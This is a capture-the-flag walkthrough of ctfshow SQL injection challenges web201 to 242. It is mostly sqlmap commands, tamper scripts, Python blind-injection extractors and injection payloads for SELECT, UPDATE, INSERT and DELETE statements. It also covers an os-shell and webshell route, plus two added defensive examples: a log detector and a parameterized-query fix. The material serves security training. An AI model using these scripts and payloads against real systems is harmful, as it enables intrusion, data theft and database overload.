ctfshow Web Basics: SQL Injection (Detailed Walkthrough) 201-250

web201

Query statement

// concatenate the SQL statement to look up the user with the given ID
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';";

Return logic

// the incoming parameter is filtered
  function waf($str){
   // the code is too simple to show
  }

Things to learn:

 Use --user-agent to specify the user agent
 --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
 Use --referer to pass the referer check
 --referer="ctf.show"


web202: POST method

Use --data to change how sqlmap sends the request, mainly for POST parameters; alternatively, capture the request in Burp first and feed it to sqlmap with -r a.txt.

--data="id=1"


web203: PUT method

Use --method to change the HTTP method sqlmap uses

--method="xxx"
Force the given HTTP method (e.g. PUT)

When using --method="PUT", you also need to add
--headers="Content-Type: text/plain"
otherwise the body is sent as a form submission and the PUT endpoint never receives it.


web204

 Use --cookie to submit cookie data
 --cookie="xx=xx"


web205

Hint: the API call requires authentication


That is exactly why --safe-url and --safe-freq are needed: packet capture shows that getToken.php must be requested before every request to index.php.

--safe-url sets a safe URL to visit before the target address is tested
--safe-freq sets how many times the safe URL is visited between two injection tests


web206

The SQL needs to be closed off

// concatenate the SQL statement to look up the user with the given ID
$sql = "select id,username,pass from ctfshow_user where id = ('".$id."') limit 0,1;";

sqlmap can work out the closing automatically

python sqlmap.py -u http://.challenge.ctf.show:8080/api/index.php --referer="ctf.show" --data="id=1" --method=PUT --headers="Content-Type: text/plain" --safe-url=http://.challenge.ctf.show:8080/api/getToken.php --safe-freq=1 -D "ctfshow_web" -T ctfshow_flaxc -C flagv --dump

web207: using tamper scripts in sqlmap

Return logic

// the incoming parameter is filtered
  function waf($str){
   return preg_match('/ /', $str);
  }

Use a tamper script to modify the injected data:
sqlmap -u "xxx" --tamper 'script name'

Common tamper scripts:

apostrophemask.py: replaces the apostrophe with its UTF-8 equivalent

equaltolike.py: replaces the equals sign with LIKE (MSSQL, SQLite)

greatest.py: bypasses filtering of '>' in MySQL by replacing it with GREATEST

space2hash.py: replaces spaces with a # sign, a random string and a newline

space2comment.py: replaces spaces with /**/

apostrophenullencode.py: replaces the apostrophe with an illegal double-unicode encoding (MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL)

halfversionedmorekeywords.py: bypasses firewalls on MySQL by adding a versioned MySQL comment before every keyword

space2morehash.py: replaces spaces in MySQL with a # sign, more random strings and a newline

appendnullbyte.py: appends an encoded NULL byte at the end of the payload (Microsoft Access)

ifnull2ifisnull.py: bypasses filtering of IFNULL (MySQL, SQLite (possibly), SAP MaxDB)

space2mssqlblank.py: replaces spaces in MSSQL with other blank characters

base64encode.py: base64-encodes the payload

space2mssqlhash.py: replaces spaces in MSSQL queries

modsecurityversioned.py: wraps the complete query in a versioned MySQL comment

space2mysqlblank.py: replaces spaces in MySQL with other blank characters

between.py: replaces the greater-than sign (>) with BETWEEN (MS SQL 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0)

space2mysqldash.py: replaces spaces with a dash comment ("--") followed by a newline ("\n") (MySQL, MSSQL)

multiplespaces.py: adds multiple spaces around SQL keywords

space2plus.py: replaces spaces with +

bluecoat.py: replaces the space after SQL keywords with a valid random blank character, then replaces = with LIKE (MySQL 5.1, SGOS)

nonrecursivereplacement.py: replaces predefined SQL keywords with representations suitable for replacement, to defeat non-recursive filters

space2randomblank.py: replaces spaces with a random blank character from a valid set

sp_password.py: appends sp_password to the end of the payload so that the DBMS log obfuscates it automatically (MSSQL)

chardoubleencode.py: double URL-encodes (already-encoded characters are not processed)

unionalltounion.py: replaces UNION ALL SELECT with UNION SELECT

charencode.py: URL-encodes (Microsoft SQL Server 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0)

randomcase.py: random upper/lower case (Microsoft SQL Server 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0)

unmagicquotes.py: wide-character bypass of GPC addslashes

randomcomments.py: splits SQL keywords with /**/

charunicodeencode.py: unicode-encodes the string (ASP, ASP.NET)

securesphere.py: appends a specially crafted string

versionedmorekeywords.py: versioned-comment bypass (MySQL >= 5.1.13)

halfversionedmorekeywords.py: adds a versioned comment before keywords (MySQL < 5.1)

Here we use the space2comment script, which replaces spaces with /**/

python sqlmap.py -u "http://c58a3bf4-e4a3-491c-b0ac-f51d484f077f.challenge.ctf.show:8080/api/index.php" --referer="ctf.show" --data="id=1" --cookie="PHPSESSID=vv1lcq36ru3v3hnu9qsk4mllub" --method="PUT" --headers="Content-Type:text/plain" --safe-url="http://c58a3bf4-e4a3-491c-b0ac-f51d484f077f.challenge.ctf.show:8080/api/getToken.php" --safe-freq=1 --tamper=space2comment.py --dump

web208

// the incoming parameter is filtered
// $id = str_replace('select', '', $id);
  function waf($str){
   return preg_match('/ /', $str);
  }

Keywords are filtered, which can be bypassed with case changes using randomcase.py; space2comment.py is still needed as well: --tamper=randomcase.py,space2comment.py

web209

Here /**/ is used in place of spaces, but in this challenge it is blocked by the WAF; %0a or %09 both work instead --tamper="tamper/space2comment.py"

Then, to deal with the filtering of =, add the following:

elif payload[i] == '=':
    retVal += chr(0x0d)+'like'+chr(0x0d)
    continue

web210-212

Return logic

// decode the query string
  function decode($id){
    return strrev(base64_decode(strrev(base64_decode($id))));
  }
  function waf($str){
    return preg_match('/ |\*/', $str);
  }

The id you submit is decoded, so you have to encode it yourself; at the same time spaces and * are filtered, so use %09 in their place.

--tamper=web212 does the job


from lib.core.compat import xrange
from lib.core.enums import PRIORITY
import base64

__priority__ = PRIORITY.LOW


def tamper(payload, **kwargs):
    # replace spaces/*, then apply the inverse of the challenge's decode():
    # base64(reverse(base64(reverse(payload))))
    payload = space2comment(payload)
    retVal = ""
    if payload:
        retVal = base64.b64encode(payload[::-1].encode('utf-8'))
        retVal = base64.b64encode(retVal[::-1]).decode('utf-8')
    return retVal

def space2comment(payload):
    # replaces the first whitespace and every unquoted space with a newline,
    # replaces * with 1 and = with "like" so the waf() regex does not match
    retVal = payload
    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += chr(0x0a)
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == "*":
                retVal += chr(0x31)
                continue

            elif payload[i] == "=":
                retVal += chr(0x0a)+'like'+chr(0x0a)
                continue

            elif payload[i] == " " and not doublequote and not quote:
                retVal += chr(0x0a)
                continue

            retVal += payload[i]

    return retVal

web213: os-shell

Practice using --os-shell to get a shell in one step

// decode the query string
  function decode($id){
    return strrev(base64_decode(strrev(base64_decode($id))));
  }
  function waf($str){
    return preg_match('/ |\*/', $str);
  }

The rough principle:
into outfile is used to write a PHP file that can upload further files into the web root; a second file is then uploaded that executes system commands and returns the result.

Conditions for using os-shell
(1) the site must run with root privileges
(2) the attacker needs to know the site's absolute path
(3) GPC is off, i.e. PHP's automatic escaping is disabled

web214

There are two POST injection points: ip & debug

# -*- coding: utf-8 -*-
# @Author  : Yn8rt
# @Time    : 2021/8/13 20:01
# @Function:
import requests

url = "http://42ef38fd-35c5-4cb5-ae0a-658cbd6d58e2.challenge.ctf.show:8080/api/"

flag = ""
i = 0
while True:
    i += 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # database name
        payload = "database()"
        # table names
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # column names - id,flag
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'"
        # data
        # payload = "select flaga from ctfshow_flagx"
        data = {
            'ip': f"if(ascii(substr(({payload}),{i},1))>{mid},sleep(1.5),1)",
            'debug':'0'
        }
        try:
            r = requests.post(url, data=data, timeout=1)
            tail = mid
        except Exception as e:
            head = mid + 1

    if head != 32:
        flag += chr(head)
    else:
        break
    print(flag)

web215

Just close the single quote:

data = {
    'ip': f"1' or if(ascii(substr(({payload}),{i},1))>{mid},sleep(1.5),1) and '1'='1",
    'debug': '0'
}

web216

Query statement

       where id = from_base64($id);

Needs closing

data = {
    'ip': f"'MQ==') or if(ascii(substr(({payload}),{i},1))>{mid},sleep(1.5),1",
    'debug': '0'
}

Final form

where id = from_base64(1) or if(ascii(substr(({payload}),{i},1))>{mid},sleep(1.5),1);

web217

About the benchmark function: it produces a simple time delay. There are also reports online of using benchmark for DoS, to overload the database. It is a fairly novel function and easy to understand.

Using the BENCHMARK function in MySQL

Key statement

data = {
    'ip': f"1) or if(ascii(substr(({payload}),{i},1))>{mid},benchmark(100000,md5(1)),1",
    'debug': '0'
}

web218

Five delay methods for MySQL time-based blind injection

Cartesian product (multi-table join), because joining tables is an expensive operation
AxB = the set of all combinations of elements of A and B, i.e. the joined table
SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C;
select * from table_name A, table_name B
select * from table_name A, table_name B,table_name C
select count(*) from table_name A, table_name B,table_name C
The tables may all be the same table.

The point is that it is expensive, so the multi-table join can be put where sleep used to be and gives the same delay effect.

Script

import requests
import sys
import time
url="http://6b39c9d3-3c24-432b-abfd-735534f0e5cf.challenge.ctf.show:8080/api/"
letter="0123456789abcdefghijklmnopqrstuvwxyz-,{_}" # drop "_" when finally extracting the flag
flag=""
for i in range(100):
    for j in letter:

        #payload="1) or if((select group_concat(table_name) from information_schema.tables where table_schema=database()) like '{}%',(select count(*) from information_schema.columns A, information_schema.columns B),0)-- -".format(flag+j)
        #payload="1) or if((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc') like '{}%',(select count(*) from information_schema.columns A, information_schema.columns B),0) -- +".format(flag+j)
        payload="1) or if((select group_concat(flagaac) from ctfshow_flagxc) like '{}%',(select count(*) from information_schema.columns A, information_schema.columns B),0)-- -".format(flag+j)
        data={
            'ip':payload,
            'debug':0
        }

        #print(res)
        try:
            # a timeout means the join ran, i.e. the prefix flag+j matched
            res = requests.post(url=url,data=data,timeout=0.15).text
        except:
            flag+=j
            print(flag)
            break
        if "}" == j:
            sys.exit()
        time.sleep(0.2) # pause 0.2s after each candidate character
    time.sleep(0.2)     # pause 0.2s after a character is matched
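The defender's side of the web214-web218 techniques, as an added example that is not part of the writeup: detection logic that flags the sleep(), benchmark() and information_schema self-join delay primitives in request bodies, after folding the /**/ and %0a whitespace substitutions from the tamper sections. The log line format and every sample line are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed log format for this example:
#   <client_ip> "<METHOD> <path>" <status> <elapsed_ms> body=<url-encoded body>
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" (?P<status>\d{3}) '
    r'(?P<elapsed>\d+) body=(?P<body>.*)$')

# The three delay primitives used in web214-web218.
DELAY_PRIMITIVES = {
    "sleep": re.compile(r"\bsleep\s*\(", re.I),
    "benchmark": re.compile(r"\bbenchmark\s*\(", re.I),
    # a FROM clause listing two or more information_schema tables (cartesian product)
    "cartesian": re.compile(
        r"\bfrom\s+information_schema\.\w+(?:\s+\w+)?"
        r"(?:\s*,\s*information_schema\.\w+(?:\s+\w+)?)+", re.I),
}
# The character-extraction shape used by the binary-search scripts above.
CHAR_PROBE = re.compile(r"\bif\s*\(\s*ascii\s*\(\s*substr\s*\(", re.I)


def normalize(body: str) -> str:
    """URL-decode, then fold the /**/, %0a and %09 substitutions tamper scripts use."""
    text = unquote_plus(body)
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text)


def classify(body: str) -> set:
    """Names of the delay primitives found in one request body (empty set if none)."""
    text = normalize(body)
    hits = {name for pat_name, pat in DELAY_PRIMITIVES.items()
            for name in [pat_name] if pat.search(text)}
    if hits and CHAR_PROBE.search(text):
        hits.add("char_probe")
    return hits


def scan(lines, slow_ms: int = 1000):
    """Return [(line_no, hits, slow)] for suspicious lines; slow = server took >= slow_ms."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_LINE.match(line)
        if not m:
            continue
        hits = classify(m["body"])
        if hits:
            findings.append((n, hits, int(m["elapsed"]) >= slow_ms))
    return findings


SAMPLE_LOG = [
    # constructed benign request
    '10.0.0.5 "POST /api/" 200 12 body=ip=127.0.0.1&debug=0',
    # constructed web214-style sleep probe (%27 is the url-encoded quote)
    '10.0.0.9 "POST /api/" 200 1503 body=ip=1%27+or+if(ascii(substr((database()),1,1))'
    '%3E99,sleep(1.5),1)+and+%271%27%3D%271&debug=0',
    # constructed web217-style benchmark probe
    '10.0.0.9 "POST /api/" 200 820 body=ip=1)+or+if(ascii(substr((database()),1,1))'
    '%3E99,benchmark(100000,md5(1)),1&debug=0',
    # constructed web218-style cartesian-product delay with /**/ instead of spaces
    '10.0.0.9 "POST /api/" 200 2410 body=ip=1)/**/or/**/if((select/**/database())/**/like'
    '/**/%27c%25%27,(select/**/count(*)/**/from/**/information_schema.columns/**/A,'
    '/**/information_schema.columns/**/B),0)--/**/-&debug=0',
]

if __name__ == "__main__":
    for n, hits, slow in scan(SAMPLE_LOG):
        print(n, sorted(hits), "slow" if slow else "fast")
```

Correlating a primitive hit with a slow response time is what separates a real probe from a harmless mention of the word in a form field.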

web219-web220

import requests
import sys
import time
url="/api/index.php"
letter="0123456789abcdefghijklmnopqrstuvwxyz-,{}" # drop "_" when finally extracting the flag
flag="ctfshow{45835205-bd93-40ff-9d71-"
for i in range(14,100):
    for j in letter:
        #payload="1) or if((table_name from information_schema.tables where table_schema=database() limit 0,1) like '{}%',(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I),1)-- -".format(flag+j)
        #payload="1) or if((select column_name from information_schema.columns where table_name='ctfshow_flagxcac') like '{}%',(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I),0) -- +".format(flag+j)
        payload="1) or if((select flagaabcc from ctfshow_flagxcac) like '{}%',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),1)-- -".format(flag+j)
        data={
            'ip':payload,
            'debug':0
        }
        #print(payload)

        try:
            # a timeout means the join ran, i.e. the prefix flag+j matched
            res = requests.post(url=url,data=data,timeout=0.15).text
        except:
            flag+=j
            print(flag)
            break
        if "}" == j:
            sys.exit()
        #print(res)
        time.sleep(0.3) # pause 0.3s after each candidate character
    time.sleep(0.3)     # pause 0.3s after a character is matched

web221: LIMIT injection

MySQL injection: LIMIT injection

Query statement

  // paged query
  $sql = select * from ctfshow_user limit ($page-1)*$limit,$limit;

Return logic

// TODO: very safe, no filtering needed
// getting the database name counts as a win

Following the linked article:

extractvalue(target xml document, xml path): a function that queries an XML document
?page=1&limit=7 procedure analyse(extractvalue(1,concat(666,database(),666)),1)

updatexml(target xml document, xml path, new content): a function that updates an XML document
?page=1&limit=7 procedure analyse(updatexml(1,concat(0x7e,database(),0x7e),1),1)

web222: GROUP BY injection

Query statement

  // paged query
  $sql = select * from ctfshow_user group by $username;

floor() error-based injection

CTF-sql: GROUP BY error-based injection

Y4's script

"""Author:Y4tacker"""
import requests

url = "http://6119f221-08cd-4363-88d4-1809bd590024.chall.ctf.show/api/"
result = ""
i = 0
while True:
    i = i + 1
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # database
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # column names
        # payload = "select column_name from information_schema.columns where table_name='ctfshow_flaga' limit 1,1"
        # data --- cannot be fetched all at once, gets less accurate further along
        payload = "select flagaabc from ctfshow_flaga"
        # flag{b747hfb7-P8e8-
        params = {
            'u': f"concat((if (ascii(substr(({payload}),{i},1))>{mid}, sleep(0.05), 2)), 1);"
        }
        try:
            r = requests.get(url, params=params, timeout=1)
            tail = mid
        except Exception as e:
            head = mid + 1
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

sleep is used here instead of floor

web223

Query statement

  // paged query
  $sql = select * from ctfshow_user group by $username;

Return logic

// TODO: very safe, no filtering needed
// the username cannot be a number

Exploitation principle

?u=if('a'='a',username,'a')
?u=if('a'='b',username,'a')

Script

import requests


def generateNum(num):
    # express a number without digits: true+true+... (each true is 1)
    res = 'true'
    if num == 1:
        return res
    else:
        for i in range(num - 1):
            res += "+true"
        return res


url = "http://ff765902-0dec-4688-8cd2-1a4cc429d30a.chall.ctf.show/api/"
i = 0
res = ""
while 1:
    head = 32
    tail = 127
    i = i + 1

    while head < tail:
        mid = (head + tail) >> 1
        # database - ctfshow_flagas
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # columns - flagasabc
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagas'"
        # flag
        payload = "select flagasabc from ctfshow_flagas"
        params = {
            "u": f"if(ascii(substr(({payload}),{generateNum(i)},{generateNum(1)}))>{generateNum(mid)},username,'a')"
        }
        r = requests.get(url, params=params)
        # print(r.json()['data'])
        if "userAUTO" in r.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        res += chr(head)
    else:
        break
    print(res)

The main change is the number-generating function, which encodes the digits used in the original script.

web224

/robots.txt:

User-agent: *
Disallow: /pwdreset.php

After logging in there is a file upload; testing showed that no file at all can be uploaded.

Going by the linked article "Injections you haven't seen", the file's comment field needs to be modified; I used the payload.bin file from the group.

The hex here is a one-line webshell. Most likely the original statement has a step that parses the comment; once that step runs, the parentheses are closed and the shell is written successfully.

After getting a shell, read upload.php


<?php
error_reporting(0);
if ($_FILES["file"]["error"] > 0) {
    die("Return Code: " . $_FILES["file"]["error"] . "\n");
}
if ($_FILES["file"]["size"] > 10 * 1024) {
    die("文件过大: " . ($_FILES["file"]["size"] / 1024) . " Kb\n");
}
if (file_exists("upload/" . $_FILES["file"]["name"])) {
    echo $_FILES["file"]["name"] . " already exists. ";
} else {
    $filename = md5(md5(rand(1, 10000))) . ".zip";
    $filetype = (new finfo)->file($_FILES['file']['tmp_name']);
    if (preg_match("/image|png|bmap|jpg|jpeg|application|text|audio|video/i", $filetype)) {
        die("file type error");
    }
    $filepath = "upload/" . $filename;
    $sql = "INSERT INTO file(filename,filepath,filetype) VALUES ('" . $filename . "','" . $filepath . "','" . $filetype . "');";
    move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $filename);
    $con = mysqli_connect("localhost", "root", "root", "ctf");
    if (!$con) {
        die('Could not connect: ' . mysqli_error());
    }
    if (mysqli_multi_query($con, $sql)) {
        header("location:filelist.php");
    } else {
        echo "Error: " . $sql . "\n" . mysqli_error($con);
    }
    mysqli_close($con);
}
?>

This confirms the guess: the key is the filetype detection step, which causes the comment's content to be read and written into the query. The linked article mentions this too, and careful readers will notice it is because of finfo.
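An added example, not the challenge's code: the upload.php INSERT rebuilt by string concatenation next to a parameterized version, run against an in-memory SQLite table standing in for file(filename,filepath,filetype). The crafted filetype string is a constructed stand-in for what finfo returns on an archive with a tampered comment.

```python
import sqlite3

SCHEMA = "CREATE TABLE file(filename TEXT, filepath TEXT, filetype TEXT)"

# Constructed stand-in for the finfo->file() result on an archive whose comment
# was crafted: it closes the quoted value and smuggles in a second statement.
CRAFTED_FILETYPE = ("Zip archive data'); "
                    "INSERT INTO file VALUES ('extra','upload/extra','injected")


def insert_concat(con, filename, filepath, filetype):
    """Mirrors upload.php: values spliced into the SQL text (vulnerable)."""
    sql = ("INSERT INTO file(filename,filepath,filetype) VALUES ('" + filename + "','"
           + filepath + "','" + filetype + "');")
    con.executescript(sql)  # multi-statement execution, like mysqli_multi_query()


def insert_param(con, filename, filepath, filetype):
    """Hardened: bind parameters, so the filetype string is data, never SQL."""
    con.execute("INSERT INTO file(filename,filepath,filetype) VALUES (?,?,?)",
                (filename, filepath, filetype))


def rows(con):
    return con.execute(
        "SELECT filename, filepath, filetype FROM file ORDER BY rowid").fetchall()


def demo(insert):
    """Insert one 'harmless' upload whose detected filetype is the crafted string."""
    con = sqlite3.connect(":memory:")
    con.execute(SCHEMA)
    insert(con, "a.zip", "upload/a.zip", CRAFTED_FILETYPE)
    return rows(con)


if __name__ == "__main__":
    print("concat :", demo(insert_concat))  # two rows: the smuggled statement ran
    print("params :", demo(insert_param))   # one row, crafted text stored verbatim
```

The preg_match denylist in upload.php inspects the MIME text for file types, not for SQL, so only the parameterized insert closes this off.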

web225: HANDLER and prepared statements

Must-read link

Query statement

  // paged query
  $sql = "select id,username,pass from ctfshow_user where username = '{$username}';";

Return logic

  // the master says the more you filter, the better
  if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set/i',$username)){
    die(json_encode($ret));
  }

Method 1: HANDLER

Besides select, MySQL can also read table data with the handler statement, which lets us browse a table row by row, although handler does not have all the capabilities of select. It is MySQL-specific and not part of the SQL standard.

/api/?username=';show tables;-- -

/api/?username=';handler `ctfshow_flagasa` open;handler `ctfshow_flagasa` read first;-- -

HANDLER ... OPEN opens a table so that it can be accessed with subsequent HANDLER ... READ statements; the table object is not shared with other sessions and is not closed until the session issues HANDLER ... CLOSE or terminates.

Method 2: prepared statements

Standard form

PREPARE name from '[my sql statement]';   // define the prepared statement
EXECUTE name;  // run the prepared statement
(DEALLOCATE || DROP) PREPARE name;  // drop the prepared statement

My version

PREPARE yn8rt from concat('selec','t * from ctfshow_flagasa');
EXECUTE yn8rt;
DROP PREPARE yn8rt;

concat(char(115,101,108,101,99,116)) can also stand in for select

web226: prepared statements with hex

Return logic

  // the master says the more you filter, the better
  if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set|show|\(/i',$username)){
    die(json_encode($ret));
  }

An online converter

PREPARE yn8rt from 0x73656c65637420666c61676173622066726f6d2063746673685f6f775f666c61676173;EXECUTE yn8rt;DROP PREPARE yn8rt;

This gets the flag directly, but for some reason select database() does not return the database name.

web227: viewing stored procedures and functions via information_schema.routines

Return logic

  // the master says the more you filter, the better
  if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set|show|db|\,/i',$username)){
    die(json_encode($ret));
  }

Key points:

MySQL: viewing stored procedures and functions
Summary of MySQL stored procedures and functions

The flag is not written to a table; it is stored in a stored procedure or function. In MySQL, information about stored procedures and functions is kept in the Routines table of the information_schema database. Query syntax: SELECT * FROM information_schema.Routines WHERE ROUTINE_NAME = 'sp_name'; where the ROUTINE_NAME column stores the names of stored procedures and functions, and sp_name is the name of the procedure or function.

Again solve it with prepared statements:

PREPARE yn8rt from 0x73656c656374202a2066726f6d20696e666f726d6174696f6e5f736368656d612e726f7574696e6573;
EXECUTE yn8rt;
DROP PREPARE yn8rt;

Remember to close the preceding single quote; once the function name getFlag is known, query more precisely:

The Routines table of the information_schema database stores the definitions of all stored procedures and functions. When using SELECT to query a definition from Routines, always specify the name with the ROUTINE_NAME column; otherwise the definitions of all stored procedures and functions are returned. If a stored procedure and a stored function share a name, the ROUTINE_TYPE column must also be specified to indicate which kind is being queried.

?username=user1';PREPARE yn8rt from 0x73656c656374202a2066726f6d20696e666f726d6174696f6e5f736368656d612e726f7574696e657320776865726520726f7574696e655f6e616d65203d2027676574466c616727;EXECUTE yn8rt;

Hex decoded: select * from information_schema.routines where routine_name = 'getFlag'

So a flag can be hidden here too

web228, 229, 230

Same as web226; done before today's task even started, nice!

web231: UPDATE

Query statement

  // paged query
  $sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

This challenge is clever. The statement is an UPDATE rather than a SELECT, so the end goal is an update, and the result is never displayed directly; instead we use a subquery to write the result into a visible column of the table and then simply read it.

payload:

// database name, closing the quote
password=1',username=database()#&username=1

Back on the initial page every username has become ctfshow_web, so the update succeeded; now the same trick can be used to find the flag.

// table names
password=1',username=(select group_concat(table_name) from information_schema.tables where table_schema=database())#&username=1
//banlist,ctfshow_user,flaga

// column names
password=1',username=(select group_concat(column_name) from information_schema.columns where table_name='flaga')#&username=1
//id,flagas,info

// flag
password=1',username=(select flagas from ctfshow_web.flaga) where 1=1#&username=1

web232

Query statement

  // paged query
  $sql = "update ctfshow_user set pass = md5('{$password}') where username = '{$username}';";

Same as web231

except the parameter goes through md5

payload:

// database name, closing the quote
password=1'),username=database()#&username=1
// flag
password=1'),username=(select flagass from ctfshow_web.flagaa) where 1=1#&username=1

The right parenthesis of the md5 function has to be closed as well.

web233

Query statement

  // paged query
  $sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

Blind injection

# -*- coding: utf-8 -*-
# @Author  : Yn8rt
# @Time    : 2021/8/18 15:32
# @Function:
import requests
import time

url = 'http://2fbf0abc-142a-43e2-abe1-c5bdebbd0823.challenge.ctf.show:8080/api/'
flag = ""
i = 0
while 1:
    i = i + 1
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # database name
        # payload = "database()"
        # data
        payload = "select flagass233 from flag233333"
        data = {
            'username': f"1' or if(ascii(substr(({payload}),{i},1))>{mid},sleep(0.1),0)#",
            'password': 'y'
        }
        try:
            r = requests.post(url=url, data=data, timeout=2.1)
            tail = mid
        except Exception as e:
            head = mid + 1
        time.sleep(1)  # sleep 1s each time a new mid is compared
    if head != 32:
        flag += chr(head)
    else:
        break
    time.sleep(1)  # sleep 1s each time a character is appended to flag
    print(flag)

This challenge revealed a problem: the docker instance can be put to sleep until it dies, and only comes back after it wakes up.

web234: escaping the quote with a backslash \

Query statement

  // paged query
  $sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

Return logic

  // no filtering

Because the single quote is filtered (the response differs depending on whether a single quote is present), a backslash is used to escape the closing quote and break out. The injection point then moves to username, since the preceding where has been swallowed into the string and lost its original role; that is what makes the set succeed.

payload:

password=1\&username=,username=(select database())#

password=1\&username=,username=(select group_concat(table_name) from information_schema.tables where table_schema=database())#
//flag23a

password=1\&username=,username=(select group_concat(column_name) from information_schema.columns where table_name=0x666c6167323361)#
//id,flagass23s3,info

password=1\&username=,username=(select flagass23s3 from flag23a)#

web235, 236: bypassing information_schema and injection without column names

Overview of MySQL statistics

CTF | MySQL injection without column names

What it means:

Use

innodb_table_stats in place of information_schema

Tables carried by MySQL's default storage engine InnoDB:
mysql.innodb_table_stats
mysql.innodb_index_stats

Both tables have database_name and table_name columns

Query statement

  // paged query
  $sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

Return logic

  // filters or and '

payload:

password=1\&username=,username=(select database())#

password=1\&username=,username=(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())#
//banlist,ctfshow_user,flag23a1

Absolutely must read: Bypassing information_schema and injection without column names

Next, injection without column names is needed

payload:

password=1\&username=,username=(select group_concat(`2`) from(select 1,2,3 union select * from flag23a1)a)#

web237: INSERT injection

Query statement

// insert data
  $sql = "insert into ctfshow_user(username,pass) value('{$username}','{$password}');";

Close it!

username=yn8rt',database());#&password=1
username=yn8rt',(select group_concat(table_name) from information_schema.tables where table_schema=database()));#&password=1
username=yn8rt',(select group_concat(column_name) from information_schema.columns where table_name='flag'));#&password=1
username=yn8rt',(select group_concat(flagass23s3) from flag));#&password=1

web238: INSERT injection

Use () in place of spaces

username=yn8rt',(select(database())));#&password=1

username=yn8rt',(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())));#&password=1

username=yn8rt',(select(group_concat(table_column))from(information_schema.columns)where(table_name='flagb')));#&password=1

username=yn8rt',(select(group_concat(flag))from(flagb)));#&password=1

web239: INSERT injection

The information_schema tables are filtered; as before, use mysql.innodb_table_stats

First list the tables
username=1',(select(group_concat(table_name))from(mysql.innodb_table_stats)where(database_name=database())))#&password=1

Then guess the column name:

username=yn8rt',(select(group_concat(flag))from(flagbb);#

web240

Hint: the table name is 9 characters, starts with flag, and the last five consist of a/b, e.g. flagabaab, all lowercase

Query statement

  // insert data
  $sql = "insert into ctfshow_user(username,pass) value('{$username}','{$password}');";

Return logic

  // filters spaces, or, sys, mysql

Python script

import requests
kk="ab"
url1="http://a1f0a0b5-fd70-4ca6-a9f2-2d6b60565ed6.challenge.ctf.show:8080/api/insert.php"
url2="http://a1f0a0b5-fd70-4ca6-a9f2-2d6b60565ed6.challenge.ctf.show:8080/api/?page=1&limit=100"
for i in kk:
    for j in kk:
        for m in kk:
            for n in kk:
                for c in kk:
                    flag="flag"+i+j+m+n+c
                    print(flag)
                    data={     
                    'username':"yn8rt',(select(group_concat(flag))from({})));#".format(flag),
                    'password':1
                    }
                    res=requests.post(url=url1,data=data).text
                    
                    r=requests.get(url=url2).text
                    print(r)
                    if "ctfshow{" in r:
                        print(res)
                        exit()

web241: DELETE injection

SQL statement

  // delete a record
  $sql = "delete from  ctfshow_user where id = {$id}";

Python script

# -*- coding: utf-8 -*-
# @Author  : Yn8rt
# @Time    : 2021/8/20 13:04
# @Function:
import requests
import time

url = 'http://060c1957-6988-495b-82a7-bd24f6611427.challenge.ctf.show:8080/api/delete.php'
flag = ''
i = 4

while 1:
    i += 1
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # database name
        # payload = 'database()'
        # table names
        # payload = '(select group_concat(table_name) from information_schema.tables where table_schema=database())'
        # column names
        # payload = "(select group_concat(column_name) from information_schema.columns where table_name='flag')"
        # flag
        payload = '(select flag from flag)'
        data = {
            'id':f"if(ascii(substr({payload},{i},1))>{mid},sleep(0.1),0)#"
        }

        try:
            r = requests.post(url=url,data=data,timeout=2.1)
            tail = mid
        except Exception as e:
            head = mid + 1
        time.sleep(1)
    if head != 32:
        flag += chr(head)
    else:
        break
    time.sleep(1)
    print(flag)

web242: file read/write

SQL statement

  // back up the table
